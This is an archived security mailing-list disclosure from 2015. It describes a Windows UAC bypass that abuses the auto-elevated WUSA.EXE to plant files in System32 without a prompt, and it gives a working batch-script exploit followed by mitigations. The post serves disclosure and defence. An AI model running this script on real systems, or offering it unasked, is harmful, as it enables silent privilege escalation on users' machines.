[<prev] [next>] [day] [month] [year] [list]
Message-ID: <68C419F0DC0F414890BEDBA76D6B3EAA@W340>
Date: Sun, 15 Mar 2015 16:48:16 +0100
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <bugtraq@...urityfocus.com>
Cc: <fulldisclosure@...lists.org>
Subject: Defense in depth -- the Microsoft way (part 31): UAC is for binary planting
Hi @ll,
the exploit shown here should be well-known to every
Windows administrator, developer or QA engineer.
In Microsoft's own terms it doesn't qualify as security
vulnerability since UAC is a security feature, not a
security boundary.
Preconditions:
* a user running as "protected Administrator" on Windows 7
and newer with standard UAC settings.
JFTR: this is the default for "out-of-the-box" installations
and typically almost never changed!
* some executables in directory %SystemRoot%\, but not in
directory %SystemRoot%\System32\ (or %SystemRoot%\SysWoW64\);
JFTR: REGEDIT.EXE is one of these executables, and it has a
manifest which specifies
<requestedExecutionLevel level="highestAvailable">,
so users running as "protected Administrator" are
accustomed to the UAC prompt when they start REGEDIT.EXE
and will most probably acknowledge the privilege elevation.
Exploit (to be run as a batch script):
for %%! in ("%SystemRoot%\*.exe" "%SystemRoot%\*.dll") do call :PLANT "%%~nx!"
exit /b
:PLANT
if exist "%SystemRoot%\System32\%~1" goto :EOF
copy NUL: "%TEMP%\%~1"
"%SystemRoot%\System32\makecab.exe" "%TEMP%\%~1" "%TEMP%\dummy.cab"
"%SystemRoot%\System32\wusa.exe" "%TEMP%\dummy.cab" /extract:"%SystemRoot%\System32"
if /I "%~x1" == ".exe" "%~1" /?
WUSA.EXE is one of the about 70 Microsoft programs which are
UAC-autoelevated since Windows 7, so the user doesn't need to
answer the UAC prompt when the batch script plants a file in
the directory "%SystemRoot%\System32\"
Mitigations:
* set the UAC control to "ask always" (as it was in Windows Vista)
* remove the user accounts created during setup from the
"Administrators" group and place them in the "Users" group, i.e.
demote these accounts from "Administrator" to "Standard user".
Start->Run "control.exe userpasswords2" alias
"rundll32.exe netplwiz.dll,UsersRunDll" allows this operation!
JFTR: don't forget to enable the builtin "Administrator" account.
Cf. <http://windows.microsoft.com/en-us/windows/user-accounts-faq>
| There are three types of accounts. Each type gives you a different
| level of control over the PC:
| * Administrator accounts provide the most control over a PC, and
| should be used sparingly. You probably created this type of
| account when you first started using your PC.
| * Standard accounts are for everyday use. If you're setting up
| accounts for other people on your PC, it's a good idea to give
| them standard accounts.
stay tuned
Stefan Kanthak
Powered by blists - more mailing lists